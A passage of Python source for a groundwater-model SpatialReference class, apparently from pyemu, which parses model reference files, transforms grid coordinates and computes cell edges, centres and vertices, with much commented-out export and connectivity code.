d = SpatialReference.attribs_from_namfile_header(namefile)
if d is not None:
return d
else:
return SpatialReference.defaults
@staticmethod
def attribs_from_namfile_header(namefile):
# check for reference info in the nam file header
d = SpatialReference.defaults.copy()
d['source'] = 'namfile'
if namefile is None:
return None
header = []
with open(namefile, 'r') as f:
for line in f:
if not line.startswith('#'):
break
header.extend(line.strip().replace(
'#', '').replace(',', ';').split(';'))
for item in header:
if "xul" in item.lower():
try:
d['xul'] = float(item.split(':')[1])
except:
print(' could not parse xul ' +
'in {}'.format(namefile))
elif "yul" in item.lower():
try:
d['yul'] = float(item.split(':')[1])
except:
print(' could not parse yul ' +
'in {}'.format(namefile))
elif "rotation" in item.lower():
try:
d['rotation'] = float(item.split(':')[1])
except:
print(' could not parse rotation ' +
'in {}'.format(namefile))
elif "proj4_str" in item.lower():
try:
proj4_str = ':'.join(item.split(':')[1:]).strip()
if proj4_str.lower() == 'none':
proj4_str = None
d['proj4_str'] = proj4_str
except:
print(' could not parse proj4_str ' +
'in {}'.format(namefile))
elif "start" in item.lower():
try:
d['start_datetime'] = item.split(':')[1].strip()
except:
print(' could not parse start ' +
'in {}'.format(namefile))
# spatial reference length units
elif "units" in item.lower():
d['units'] = item.split(':')[1].strip()
# model length units
elif "lenuni" in item.lower():
d['lenuni'] = int(item.split(':')[1].strip())
# multiplier for converting from model length units to sr length units
elif "length_multiplier" in item.lower():
d['length_multiplier'] = float(item.split(':')[1].strip())
return d
@staticmethod
def read_usgs_model_reference_file(reffile='usgs.model.reference'):
"""
read spatial reference info from the usgs.model.reference file
https://water.usgs.gov/ogw/policy/gw-model/modelers-setup.html
"""
ITMUNI = {0: "undefined", 1: "seconds", 2: "minutes", 3: "hours",
4: "days",
5: "years"}
itmuni_values = {v: k for k, v in ITMUNI.items()}
d = SpatialReference.defaults.copy()
d['source'] = 'usgs.model.reference'
# discard default to avoid confusion with epsg code if entered
d.pop('proj4_str')
if os.path.exists(reffile):
with open(reffile) as fref:
for line in fref:
if len(line) > 1:
if line.strip()[0] != '#':
info = line.strip().split('#')[0].split()
if len(info) > 1:
d[info[0].lower()] = ' '.join(info[1:])
d['xul'] = float(d['xul'])
d['yul'] = float(d['yul'])
d['rotation'] = float(d['rotation'])
# convert the model.reference text to a lenuni value
# (these are the model length units)
if 'length_units' in d.keys():
d['lenuni'] = SpatialReference.lenuni_values[d['length_units']]
if 'time_units' in d.keys():
d['itmuni'] = itmuni_values[d['time_units']]
if 'start_date' in d.keys():
start_datetime = d.pop('start_date')
if 'start_time' in d.keys():
start_datetime += ' {}'.format(d.pop('start_time'))
d['start_datetime'] = start_datetime
if 'epsg' in d.keys():
try:
d['epsg'] = int(d['epsg'])
except Exception as e:
raise Exception(
"error reading epsg code from file:\n" + str(e))
# this prioritizes epsg over proj4 if both are given
# (otherwise 'proj4' entry will be dropped below)
elif 'proj4' in d.keys():
d['proj4_str'] = d['proj4']
# drop any other items that aren't used in sr class
d = {k: v for k, v in d.items() if
k.lower() in SpatialReference.defaults.keys()
or k.lower() in {'epsg', 'start_datetime', 'itmuni',
'source'}}
return d
else:
return None
def __setattr__(self, key, value):
reset = True
if key == "delr":
super(SpatialReference, self). \
__setattr__("delr", np.atleast_1d(np.array(value)))
elif key == "delc":
super(SpatialReference, self). \
__setattr__("delc", np.atleast_1d(np.array(value)))
elif key == "xul":
super(SpatialReference, self). \
__setattr__("_xul", float(value))
self.origin_loc = 'ul'
elif key == "yul":
super(SpatialReference, self). \
__setattr__("_yul", float(value))
self.origin_loc = 'ul'
elif key == "xll":
super(SpatialReference, self). \
__setattr__("_xll", float(value))
self.origin_loc = 'll'
elif key == "yll":
super(SpatialReference, self). \
__setattr__("_yll", float(value))
self.origin_loc = 'll'
elif key == "length_multiplier":
super(SpatialReference, self). \
__setattr__("_length_multiplier", float(value))
elif key == "rotation":
super(SpatialReference, self). \
__setattr__("rotation", float(value))
elif key == "lenuni":
super(SpatialReference, self). \
__setattr__("_lenuni", int(value))
elif key == "units":
value = value.lower()
assert value in self.supported_units
super(SpatialReference, self). \
__setattr__("_units", value)
elif key == "proj4_str":
super(SpatialReference, self). \
__setattr__("_proj4_str", value)
# reset the units and epsg
units = self._parse_units_from_proj4()
if units is not None:
self._units = units
self._epsg = None
elif key == "epsg":
super(SpatialReference, self). \
__setattr__("_epsg", value)
# reset the units and proj4
# self._units = None
# self._proj4_str = getproj4(self._epsg)
# self.crs = crs(epsg=value)
elif key == "prj":
super(SpatialReference, self). \
__setattr__("prj", value)
# translation to proj4 strings in crs class not robust yet
# leave units and proj4 alone for now.
# self.crs = CRS(prj=value, epsg=self.epsg)
else:
super(SpatialReference, self).__setattr__(key, value)
reset = False
if reset:
self._reset()
def reset(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
return
def _reset(self):
self._xgrid = None
self._ygrid = None
self._ycentergrid = None
self._xcentergrid = None
self._vertices = None
return
@property
def nrow(self):
return self.delc.shape[0]
@property
def ncol(self):
return self.delr.shape[0]
def __eq__(self, other):
if not isinstance(other, SpatialReference):
return False
if other.xul != self.xul:
return False
if other.yul != self.yul:
return False
if other.rotation != self.rotation:
return False
if other.proj4_str != self.proj4_str:
return False
return True
@classmethod
def from_namfile(cls, namefile, delr=np.array([]), delc=np.array([])):
if delr is None or delc is None:
warnings.warn("One or both of grid spacing information "
"missing,\n required for most pyemu methods "
"that use sr,\n can be passed later if desired "
"(e.g. sr.delr = row spacing)", PyemuWarning)
attribs = SpatialReference.attribs_from_namfile_header(namefile)
attribs['delr'] = delr
attribs['delc'] = delc
try:
attribs.pop("start_datetime")
except:
print(' could not remove start_datetime')
return SpatialReference(**attribs)
@classmethod
def from_gridspec(cls, gridspec_file, lenuni=0):
f = open(gridspec_file, 'r')
raw = f.readline().strip().split()
nrow = int(raw[0])
ncol = int(raw[1])
raw = f.readline().strip().split()
xul, yul, rot = float(raw[0]), float(raw[1]), float(raw[2])
delr = []
j = 0
while j < ncol:
raw = f.readline().strip().split()
for r in raw:
if '*' in r:
rraw = r.split('*')
for n in range(int(rraw[0])):
delr.append(float(rraw[1]))
j += 1
else:
delr.append(float(r))
j += 1
delc = []
i = 0
while i < nrow:
raw = f.readline().strip().split()
for r in raw:
if '*' in r:
rraw = r.split('*')
for n in range(int(rraw[0])):
delc.append(float(rraw[1]))
i += 1
else:
delc.append(float(r))
i += 1
f.close()
return cls(np.array(delr), np.array(delc),
lenuni, xul=xul, yul=yul, rotation=rot)
@property
def attribute_dict(self):
return {"xul": self.xul, "yul": self.yul, "rotation": self.rotation,
"proj4_str": self.proj4_str}
def set_spatialreference(self, xul=None, yul=None, xll=None, yll=None,
rotation=0.0):
"""
set spatial reference - can be called from model instance
"""
if xul is not None and xll is not None:
msg = ('Both xul and xll entered. Please enter either xul, yul or '
'xll, yll.')
raise ValueError(msg)
if yul is not None and yll is not None:
msg = ('Both yul and yll entered. Please enter either xul, yul or '
'xll, yll.')
raise ValueError(msg)
# set the origin priority based on the left corner specified
# (the other left corner will be calculated). If none are specified
# then default to upper left
if xul is None and yul is None and xll is None and yll is None:
self.origin_loc = 'ul'
xul = 0.
yul = self.delc.sum()
elif xll is not None:
self.origin_loc = 'll'
else:
self.origin_loc = 'ul'
self.rotation = rotation
self._xll = xll if xll is not None else 0.
self._yll = yll if yll is not None else 0.
self._xul = xul if xul is not None else 0.
self._yul = yul if yul is not None else 0.
return
def __repr__(self):
s = "xul:{0:<.10G}; yul:{1:<.10G}; rotation:{2:<G}; ". \
format(self.xul, self.yul, self.rotation)
s += "proj4_str:{0}; ".format(self.proj4_str)
s += "units:{0}; ".format(self.units)
s += "lenuni:{0}; ".format(self.lenuni)
s += "length_multiplier:{}".format(self.length_multiplier)
return s
@property
def theta(self):
return -self.rotation * np.pi / 180.
@property
def xedge(self):
return self.get_xedge_array()
@property
def yedge(self):
return self.get_yedge_array()
@property
def xgrid(self):
if self._xgrid is None:
self._set_xygrid()
return self._xgrid
@property
def ygrid(self):
if self._ygrid is None:
self._set_xygrid()
return self._ygrid
@property
def xcenter(self):
return self.get_xcenter_array()
@property
def ycenter(self):
return self.get_ycenter_array()
@property
def ycentergrid(self):
if self._ycentergrid is None:
self._set_xycentergrid()
return self._ycentergrid
@property
def xcentergrid(self):
if self._xcentergrid is None:
self._set_xycentergrid()
return self._xcentergrid
def _set_xycentergrid(self):
self._xcentergrid, self._ycentergrid = np.meshgrid(self.xcenter,
self.ycenter)
self._xcentergrid, self._ycentergrid = self.transform(
self._xcentergrid,
self._ycentergrid)
def _set_xygrid(self):
self._xgrid, self._ygrid = np.meshgrid(self.xedge, self.yedge)
self._xgrid, self._ygrid = self.transform(self._xgrid, self._ygrid)
@staticmethod
def rotate(x, y, theta, xorigin=0., yorigin=0.):
"""
Given x and y array-like values calculate the rotation about an
arbitrary origin and then return the rotated coordinates. theta is in
degrees.
"""
# jwhite changed on Oct 11 2016 - rotation is now positive CCW
# theta = -theta * np.pi / 180.
theta = theta * np.pi / 180.
xrot = xorigin + np.cos(theta) * (x - xorigin) - np.sin(theta) * \
(y - yorigin)
yrot = yorigin + np.sin(theta) * (x - xorigin) + np.cos(theta) * \
(y - yorigin)
return xrot, yrot
def transform(self, x, y, inverse=False):
"""
Given x and y array-like values, apply rotation, scale and offset,
to convert them from model coordinates to real-world coordinates.
"""
if isinstance(x, list):
x = np.array(x)
y = np.array(y)
if not np.isscalar(x):
x, y = x.copy(), y.copy()
if not inverse:
x *= self.length_multiplier
y *= self.length_multiplier
x += self.xll
y += self.yll
x, y = SpatialReference.rotate(x, y, theta=self.rotation,
xorigin=self.xll, yorigin=self.yll)
else:
x, y = SpatialReference.rotate(x, y, -self.rotation,
self.xll, self.yll)
x -= self.xll
y -= self.yll
x /= self.length_multiplier
y /= self.length_multiplier
return x, y
def get_extent(self):
"""
Get the extent of the rotated and offset grid
Return (xmin, xmax, ymin, ymax)
"""
x0 = self.xedge[0]
x1 = self.xedge[-1]
y0 = self.yedge[0]
y1 = self.yedge[-1]
# upper left point
x0r, y0r = self.transform(x0, y0)
# upper right point
x1r, y1r = self.transform(x1, y0)
# lower right point
x2r, y2r = self.transform(x1, y1)
# lower left point
x3r, y3r = self.transform(x0, y1)
xmin = min(x0r, x1r, x2r, x3r)
xmax = max(x0r, x1r, x2r, x3r)
ymin = min(y0r, y1r, y2r, y3r)
ymax = max(y0r, y1r, y2r, y3r)
return (xmin, xmax, ymin, ymax)
def get_grid_lines(self):
"""
Get the grid lines as a list
"""
xmin = self.xedge[0]
xmax = self.xedge[-1]
ymin = self.yedge[-1]
ymax = self.yedge[0]
lines = []
# Vertical lines
for j in range(self.ncol + 1):
x0 = self.xedge[j]
x1 = x0
y0 = ymin
y1 = ymax
x0r, y0r = self.transform(x0, y0)
x1r, y1r = self.transform(x1, y1)
lines.append([(x0r, y0r), (x1r, y1r)])
# horizontal lines
for i in range(self.nrow + 1):
x0 = xmin
x1 = xmax
y0 = self.yedge[i]
y1 = y0
x0r, y0r = self.transform(x0, y0)
x1r, y1r = self.transform(x1, y1)
lines.append([(x0r, y0r), (x1r, y1r)])
return lines
# def get_grid_line_collection(self, **kwargs):
# """
# Get a LineCollection of the grid
#
# """
# from flopy.plot import ModelMap
#
# map = ModelMap(sr=self)
# lc = map.plot_grid(**kwargs)
# return lc
def get_xcenter_array(self):
"""
Return a numpy one-dimensional float array that has the cell center x
coordinate for every column in the grid in model space - not offset or rotated.
"""
assert (self.delr is not None
and len(self.delr) > 0), ("delr not passed to "
"spatial reference object")
x = np.add.accumulate(self.delr) - 0.5 * self.delr
return x
def get_ycenter_array(self):
"""
Return a numpy one-dimensional float array that has the cell center x
coordinate for every row in the grid in model space - not offset of rotated.
"""
assert (self.delc is not None
and len(self.delc) > 0), ("delc not passed to "
"spatial reference object")
Ly = np.add.reduce(self.delc)
y = Ly - (np.add.accumulate(self.delc) - 0.5 *
self.delc)
return y
def get_xedge_array(self):
"""
Return a numpy one-dimensional float array that has the cell edge x
coordinates for every column in the grid in model space - not offset
or rotated. Array is of size (ncol + 1)
"""
assert (self.delr is not None
and len(self.delr) > 0), ("delr not passed to "
"spatial reference object")
xedge = np.concatenate(([0.], np.add.accumulate(self.delr)))
return xedge
def get_yedge_array(self):
"""
Return a numpy one-dimensional float array that has the cell edge y
coordinates for every row in the grid in model space - not offset or
rotated. Array is of size (nrow + 1)
"""
assert (self.delc is not None
and len(self.delc) > 0), ("delc not passed to "
"spatial reference object")
length_y = np.add.reduce(self.delc)
yedge = np.concatenate(([length_y], length_y -
np.add.accumulate(self.delc)))
return yedge
def write_gridspec(self, filename):
""" write a PEST-style grid specification file
"""
f = open(filename, 'w')
f.write(
"{0:10d} {1:10d}\n".format(self.delc.shape[0], self.delr.shape[0]))
f.write("{0:15.6E} {1:15.6E} {2:15.6E}\n".format(
self.xul * self.length_multiplier,
self.yul * self.length_multiplier,
self.rotation))
for r in self.delr:
f.write("{0:15.6E} ".format(r))
f.write('\n')
for c in self.delc:
f.write("{0:15.6E} ".format(c))
f.write('\n')
return
def get_vertices(self, i, j):
"""Get vertices for a single cell or sequence if i, j locations."""
pts = []
xgrid, ygrid = self.xgrid, self.ygrid
pts.append([xgrid[i, j], ygrid[i, j]])
pts.append([xgrid[i + 1, j], ygrid[i + 1, j]])
pts.append([xgrid[i + 1, j + 1], ygrid[i + 1, j + 1]])
pts.append([xgrid[i, j + 1], ygrid[i, j + 1]])
pts.append([xgrid[i, j], ygrid[i, j]])
if np.isscalar(i):
return pts
else:
vrts = np.array(pts).transpose([2, 0, 1])
return [v.tolist() for v in vrts]
def get_rc(self, x, y):
return self.get_ij(x, y)
def get_ij(self, x, y):
"""Return the row and column of a point or sequence of points
in real-world coordinates.
Parameters
----------
x : scalar or sequence of x coordinates
y : scalar or sequence of y coordinates
Returns
-------
i : row or sequence of rows (zero-based)
j : column or sequence of columns (zero-based)
"""
if np.isscalar(x):
c = (np.abs(self.xcentergrid[0] - x)).argmin()
r = (np.abs(self.ycentergrid[:, 0] - y)).argmin()
else:
xcp = np.array([self.xcentergrid[0]] * (len(x)))
ycp = np.array([self.ycentergrid[:, 0]] * (len(x)))
c = (np.abs(xcp.transpose() - x)).argmin(axis=0)
r = (np.abs(ycp.transpose() - y)).argmin(axis=0)
return r, c
# def get_grid_map_plotter(self, **kwargs):
# """
# Create a QuadMesh plotting object for this grid
#
# Returns
# -------
# quadmesh : matplotlib.collections.QuadMesh
#
# """
# from matplotlib.collections import QuadMesh
# verts = np.vstack((self.xgrid.flatten(), self.ygrid.flatten())).T
# qm = QuadMesh(self.ncol, self.nrow, verts)
# return qm
#
# def plot_array(self, a, ax=None, **kwargs):
# """
# Create a QuadMesh plot of the specified array using pcolormesh
#
# Parameters
# ----------
# a : np.ndarray
#
# Returns
# -------
# quadmesh : matplotlib.collections.QuadMesh
#
# """
# import matplotlib.pyplot as plt
# if ax is None:
# ax = plt.gca()
# qm = ax.pcolormesh(self.xgrid, self.ygrid, a, **kwargs)
# return qm
# def export_array(self, filename, a, nodata=-9999,
# fieldname='value',
# **kwargs):
# """
# Write a numpy array to Arc Ascii grid or shapefile with the
# model reference.
#
# Parameters
# ----------
# filename : str
# Path of output file. Export format is determined by
# file extension.
# '.asc' Arc Ascii grid
# '.tif' GeoTIFF (requires rasterio package)
# '.shp' Shapefile
# a : 2D numpy.ndarray
# Array to export
# nodata : scalar
# Value to assign to np.nan entries (default -9999)
# fieldname : str
# Attribute field name for array values (shapefile export only).
# (default 'values')
# kwargs:
# keyword arguments to np.savetxt (ascii)
# rasterio.open (GeoTIFF)
# or flopy.export.shapefile_utils.write_grid_shapefile2
#
# Notes
# -----
# Rotated grids will be either be unrotated prior to export,
# using scipy.ndimage.rotate (Arc Ascii format) or rotation will be
# included in their transform property (GeoTiff format). In either case
# the pixels will be displayed in the (unrotated) projected geographic coordinate system,
# so the pixels will no longer align exactly with the model grid
# (as displayed from a shapefile, for example). A key difference between
# Arc Ascii and GeoTiff (besides disk usage) is that the
# unrotated Arc Ascii will have a different grid size, whereas the GeoTiff
# will have the same number of rows and pixels as the original.
#
# """
#
# if filename.lower().endswith(".asc"):
# if len(np.unique(self.delr)) != len(np.unique(self.delc)) != 1 \
# or self.delr[0] != self.delc[0]:
# raise ValueError('Arc ascii arrays require a uniform grid.')
#
# xll, yll = self.xll, self.yll
# cellsize = self.delr[0] * self.length_multiplier
# fmt = kwargs.get('fmt', '%.18e')
# a = a.copy()
# a[np.isnan(a)] = nodata
# if self.rotation != 0:
# try:
# from scipy.ndimage import rotate
# a = rotate(a, self.rotation, cval=nodata)
# height_rot, width_rot = a.shape
# xmin, ymin, xmax, ymax = self.bounds
# dx = (xmax - xmin) / width_rot
# dy = (ymax - ymin) / height_rot
# cellsize = np.max((dx, dy))
# # cellsize = np.cos(np.radians(self.rotation)) * cellsize
# xll, yll = xmin, ymin
# except ImportError:
# print('scipy package required to export rotated grid.')
#
# filename = '.'.join(
# filename.split('.')[:-1]) + '.asc' # enforce .asc ending
# nrow, ncol = a.shape
# a[np.isnan(a)] = nodata
# txt = 'ncols {:d}\n'.format(ncol)
# txt += 'nrows {:d}\n'.format(nrow)
# txt += 'xllcorner {:f}\n'.format(xll)
# txt += 'yllcorner {:f}\n'.format(yll)
# txt += 'cellsize {}\n'.format(cellsize)
# # ensure that nodata fmt consistent w values
# txt += 'NODATA_value {}\n'.format(fmt) % (nodata)
# with open(filename, 'w') as output:
# output.write(txt)
# with open(filename, 'ab') as output:
# np.savetxt(output, a, **kwargs)
# print('wrote {}'.format(filename))
#
# elif filename.lower().endswith(".tif"):
# if len(np.unique(self.delr)) != len(np.unique(self.delc)) != 1 \
# or self.delr[0] != self.delc[0]:
# raise ValueError('GeoTIFF export require a uniform grid.')
# try:
# import rasterio
# from rasterio import Affine
# except:
# print('GeoTIFF export requires the rasterio package.')
# return
# dxdy = self.delc[0] * self.length_multiplier
# trans = Affine.translation(self.xul, self.yul) * \
# Affine.rotation(self.rotation) * \
# Affine.scale(dxdy, -dxdy)
#
# # third dimension is the number of bands
# a = a.copy()
# if len(a.shape) == 2:
# a = np.reshape(a, (1, a.shape[0], a.shape[1]))
# if a.dtype.name == 'int64':
# a = a.astype('int32')
# dtype = rasterio.int32
# elif a.dtype.name == 'int32':
# dtype = rasterio.int32
# elif a.dtype.name == 'float64':
# dtype = rasterio.float64
# elif a.dtype.name == 'float32':
# dtype = rasterio.float32
# else:
# msg = 'ERROR: invalid dtype "{}"'.format(a.dtype.name)
# raise TypeError(msg)
#
# meta = {'count': a.shape[0],
# 'width': a.shape[2],
# 'height': a.shape[1],
# 'nodata': nodata,
# 'dtype': dtype,
# 'driver': 'GTiff',
# 'crs': self.proj4_str,
# 'transform': trans
# }
# meta.update(kwargs)
# with rasterio.open(filename, 'w', **meta) as dst:
# dst.write(a)
# print('wrote {}'.format(filename))
#
# elif filename.lower().endswith(".shp"):
# from ..export.shapefile_utils import write_grid_shapefile2
# epsg = kwargs.get('epsg', None)
# prj = kwargs.get('prj', None)
# if epsg is None and prj is None:
# epsg = self.epsg
# write_grid_shapefile2(filename, self, array_dict={fieldname: a},
# nan_val=nodata,
# epsg=epsg, prj=prj)
# def export_contours(self, filename, contours,
# fieldname='level', epsg=None, prj=None,
# **kwargs):
# """
# Convert matplotlib contour plot object to shapefile.
#
# Parameters
# ----------
# filename : str
# path of output shapefile
# contours : matplotlib.contour.QuadContourSet or list of them
# (object returned by matplotlib.pyplot.contour)
# epsg : int
# EPSG code. See https://www.epsg-registry.org/ or spatialreference.org
# prj : str
# Existing projection file to be used with new shapefile.
# **kwargs : key-word arguments to flopy.export.shapefile_utils.recarray2shp
#
# Returns
# -------
# df : dataframe of shapefile contents
#
# """
# from flopy.utils.geometry import LineString
# from flopy.export.shapefile_utils import recarray2shp
#
# if not isinstance(contours, list):
# contours = [contours]
#
# if epsg is None:
# epsg = self._epsg
# if prj is None:
# prj = self.proj4_str
#
# geoms = []
# level = []
# for ctr in contours:
# levels = ctr.levels
# for i, c in enumerate(ctr.collections):
# paths = c.get_paths()
# geoms += [LineString(p.vertices) for p in paths]
# level += list(np.ones(len(paths)) * levels[i])
#
# # convert the dictionary to a recarray
# ra = np.array(level,
# dtype=[(fieldname, float)]).view(np.recarray)
#
# recarray2shp(ra, geoms, filename, epsg=epsg, prj=prj, **kwargs)
#
# def export_array_contours(self, filename, a,
# fieldname='level',
# interval=None,
# levels=None,
# maxlevels=1000,
# epsg=None,
# prj=None,
# **kwargs):
# """
# Contour an array using matplotlib; write shapefile of contours.
#
# Parameters
# ----------
# filename : str
# Path of output file with '.shp' extension.
# a : 2D numpy array
# Array to contour
# epsg : int
# EPSG code. See https://www.epsg-registry.org/ or spatialreference.org
# prj : str
# Existing projection file to be used with new shapefile.
# **kwargs : key-word arguments to flopy.export.shapefile_utils.recarray2shp
#
# """
# import matplotlib.pyplot as plt
#
# if epsg is None:
# epsg = self._epsg
# if prj is None:
# prj = self.proj4_str
#
# if interval is not None:
# vmin = np.nanmin(a)
# vmax = np.nanmax(a)
# nlevels = np.round(np.abs(vmax - vmin) / interval, 2)
# msg = '{:.0f} levels '.format(nlevels) + \
# 'at interval of {} > '.format(interval) + \
# 'maxlevels = {}'.format(maxlevels)
# assert nlevels < maxlevels, msg
# levels = np.arange(vmin, vmax, interval)
# fig, ax = plt.subplots()
# ctr = self.contour_array(ax, a, levels=levels)
# self.export_contours(filename, ctr, fieldname, epsg, prj, **kwargs)
# plt.close()
#
# def contour_array(self, ax, a, **kwargs):
# """
# Create a QuadMesh plot of the specified array using pcolormesh
#
# Parameters
# ----------
# ax : matplotlib.axes.Axes
# ax to add the contours
#
# a : np.ndarray
# array to contour
#
# Returns
# -------
# contour_set : ContourSet
#
# """
# from flopy.plot import ModelMap
#
# kwargs['ax'] = ax
# mm = ModelMap(sr=self)
# contour_set = mm.contour_array(a=a, **kwargs)
#
# return contour_set
@property
def vertices(self):
"""
Returns a list of vertices for
"""
if self._vertices is None:
self._set_vertices()
return self._vertices
def _set_vertices(self):
"""
Populate vertices for the whole grid
"""
jj, ii = np.meshgrid(range(self.ncol), range(self.nrow))
jj, ii = jj.ravel(), ii.ravel()
self._vertices = self.get_vertices(ii, jj)
# def interpolate(self, a, xi, method='nearest'):
# """
# Use the griddata method to interpolate values from an array onto the
# points defined in xi. For any values outside of the grid, use
# 'nearest' to find a value for them.
#
# Parameters
# ----------
# a : numpy.ndarray
# array to interpolate from. It must be of size nrow, ncol
# xi : numpy.ndarray
# array containing x and y point coordinates of size (npts, 2). xi
# also works with broadcasting so that if a is a 2d array, then
# xi can be passed in as (xgrid, ygrid).
# method : {'linear', 'nearest', 'cubic'}
# method to use for interpolation (default is 'nearest')
#
# Returns
# -------
# b : numpy.ndarray
# array of size (npts)
#
# """
# try:
# from scipy.interpolate import griddata
# except:
# print('scipy not installed\ntry pip install scipy')
# return None
#
# # Create a 2d array of points for the grid centers
# points = np.empty((self.ncol * self.nrow, 2))
# points[:, 0] = self.xcentergrid.flatten()
# points[:, 1] = self.ycentergrid.flatten()
#
# # Use the griddata function to interpolate to the xi points
# b = griddata(points, a.flatten(), xi, method=method, fill_value=np.nan)
#
# # if method is linear or cubic, then replace nan's with a value
# # interpolated using nearest
# if method != 'nearest':
# bn = griddata(points, a.flatten(), xi, method='nearest')
# idx = np.isnan(b)
# b[idx] = bn[idx]
#
# return b
# def get_2d_vertex_connectivity(self):
# """
# Create the cell 2d vertices array and the iverts index array. These
# are the same form as the ones used to instantiate an unstructured
# spatial reference.
#
# Returns
# -------
#
# verts : ndarray
# array of x and y coordinates for the grid vertices
#
# iverts : list
# a list with a list of vertex indices for each cell in clockwise
# order starting with the upper left corner
#
# """
# x = self.xgrid.flatten()
# y = self.ygrid.flatten()
# nrowvert = self.nrow + 1
# ncolvert = self.ncol + 1
# npoints = nrowvert * ncolvert
# verts = np.empty((npoints, 2), dtype=np.float)
# verts[:, 0] = x
# verts[:, 1] = y
# iverts = []
# for i in range(self.nrow):
# for j in range(self.ncol):
# iv1 = i * ncolvert + j # upper left point number
# iv2 = iv1 + 1
# iv4 = (i + 1) * ncolvert + j
# iv3 = iv4 + 1
# iverts.append([iv1, iv2, iv3, iv4])
# return verts, iverts
# def get_3d_shared_vertex_connectivity(self, nlay, botm, ibound=None):
#
# # get the x and y points for the grid
# x = self.xgrid.flatten()
# y = self.ygrid.flatten()
#
# # set the size of the vertex grid
# nrowvert = self.nrow + 1
# ncolvert = self.ncol + 1
# nlayvert = nlay + 1
# nrvncv = nrowvert * ncolvert
# npoints = nrvncv * nlayvert
#
# # create and fill a 3d points array for the grid
# verts = np.empty((npoints, 3), dtype=np.float)
# verts[:, 0] = np.tile(x, nlayvert)
# verts[:, 1] = np.tile(y, nlayvert)
# istart = 0
# istop = nrvncv
# for k in range(nlay + 1):
# verts[istart:istop, 2] = self.interpolate(botm[k],
# verts[istart:istop, :2],
# method='linear')
# istart = istop
# istop = istart + nrvncv
#
# # create the list of points comprising each cell. points must be
# # listed a specific way according to vtk requirements.
# iverts = []
# for k in range(nlay):
# koffset = k * nrvncv
# for i in range(self.nrow):
# for j in range(self.ncol):
# if ibound is not None:
# if ibound[k, i, j] == 0:
# continue
# iv1 = i * ncolvert + j + koffset
# iv2 = iv1 + 1
# iv4 = (i + 1) * ncolvert + j + koffset
# iv3 = iv4 + 1
# iverts.append([iv4 + nrvncv, iv3 + nrvncv,
# iv1 + nrvncv, iv2 + nrvncv,
# iv4, iv3, iv1, iv2])
#
# # renumber and reduce the vertices if ibound_filter
# if ibound is not None:
#
# # go through the vertex list and mark vertices that are used
# ivertrenum = np.zeros(npoints, dtype=np.int)
# for vlist in iverts:
# for iv in vlist:
# # mark vertices that are actually used
# ivertrenum[iv] = 1
#
# # renumber vertices that are used, skip those that are not
# inum = 0
# for i in range(npoints):
# if ivertrenum[i] > 0:
# inum += 1
# ivertrenum[i] = inum
# ivertrenum -= 1
#
# # reassign the vertex list using the new vertex numbers
# iverts2 = []
# for vlist in iverts:
# vlist2 = []
# for iv in vlist:
# vlist2.append(ivertrenum[iv])
# iverts2.append(vlist2)
# iverts = iverts2
# idx = np.where(ivertrenum >= 0)
# verts = verts[idx]
#
# return verts, iverts
# def get_3d_vertex_connectivity(self, nlay, top, bot, ibound=None):
# if ibound is None:
# ncells = nlay * self.nrow * self.ncol
# ibound = np.ones((nlay, self.nrow, self.ncol), dtype=np.int)
# else:
# ncells = (ibound != 0).sum()
# npoints = ncells * 8
# verts = np.empty((npoints, 3), dtype=np.float)
# iverts = []
# ipoint = 0
# for k in range(nlay):
# for i in range(self.nrow):
# for j in range(self.ncol):
# if ibound[k, i, j] == 0:
# continue
#
# ivert = []
# pts = self.get_vertices(i, j)
# pt0, pt1, pt2, pt3, pt0 = pts
#
# z = bot[k, i, j]
#
# verts[ipoint, 0:2] = np.array(pt1)
# verts[ipoint, 2] = z
# ivert.append(ipoint)
# ipoint += 1
#
# verts[ipoint, 0:2] = np.array(pt2)
# verts[ipoint, 2] = z
# ivert.append(ipoint)
# ipoint += 1
#
# verts[ipoint, 0:2] = np.array(pt0)
# verts[ipoint, 2] = z
# ivert.append(ipoint)
# ipoint += 1
#
# verts[ipoint, 0:2] = np.array(pt3)
# verts[ipoint, 2] = z
# ivert.append(ipoint)
# ipoint += 1
#
# z = top[k, i, j]
#
# verts[ipoint, 0:2] = np.array(pt1)
# verts[ipoint, 2] = z
# ivert.append(ipoint)
# ipoint += 1
#
# verts[ipoint, 0:2] = np.array(pt2)
# verts[ipoint, 2] = z
# ivert.append(ipoint)
# ipoint += 1
#
# verts[ipoint, 0:2] = np.array(pt0)
# verts[ipoint, 2] = z
# ivert.append(ipoint)
# ipoint += 1
#
# verts[ipoint, 0:2] = np.array(pt3)
# verts[ipoint, 2] = z
# ivert.append(ipoint)
# ipoint += 1
#
# iverts.append(ivert)
#
# return verts, iverts
# class EpsgRef:
# """
# Sets up a local database of text representations of coordinate reference
# systems, keyed by EPSG code.
#
# The database is epsgref.json, located in the user's data directory. If
# optional 'appdirs' package is available, this is in the platform-dependent
# user directory, otherwise in the user's 'HOME/.flopy' directory.
# """
#
# def __init__(self):
# try:
# from appdirs import user_data_dir
# except ImportError:
# user_data_dir = None
# if user_data_dir:
# datadir = user_data_dir('flopy')
# else:
# # if appdirs is not installed, use user's home directory
# datadir = os.path.join(os.path.expanduser('~'), '.flopy')
# if not os.path.isdir(datadir):
# os.makedirs(datadir)
# dbname = 'epsgref.json'
# self.location = os.path.join(datadir, dbname)
#
# def to_dict(self):
# """
# Returns dict with EPSG code integer key, and WKT CRS text
# """
# data = OrderedDict()
# if os.path.exists(self.location):
# with open(self.location, 'r') as f:
# loaded_data = json.load(f, object_pairs_hook=OrderedDict)
# # convert JSON key from str to EPSG integer
# for key, value in loaded_data.items():
# try:
# data[int(key)] = value
# except ValueError:
# data[key] = value
# return data
#
# def _write(self, data):
# with open(self.location, 'w') as f:
# json.dump(data, f, indent=0)
# f.write('\n')
#
# def reset(self, verbose=True):
# if os.path.exists(self.location):
# os.remove(self.location)
# if verbose:
# print('Resetting {}'.format(self.location))
#
# def add(self, epsg, prj):
# """
# add an epsg code to epsgref.json
# """
# data = self.to_dict()
# data[epsg] = prj
# self._write(data)
#
# def get(self, epsg):
# """
# returns prj from a epsg code, otherwise None if not found
# """
# data = self.to_dict()
# return data.get(epsg)
#
# def remove(self, epsg):
# """
# removes an epsg entry from epsgref.json
# """
# data = self.to_dict()
# if epsg in data:
# del data[epsg]
# self._write(data)
#
# @staticmethod
# def show():
# ep = EpsgRef()
# prj = ep.to_dict()
# for k, v in prj.items():
# print('{}:\n{}\n'.format(k, v))
# class CRS(object):
# """
# Container to parse and store coordinate reference system parameters,
# and translate between different formats.
# """
#
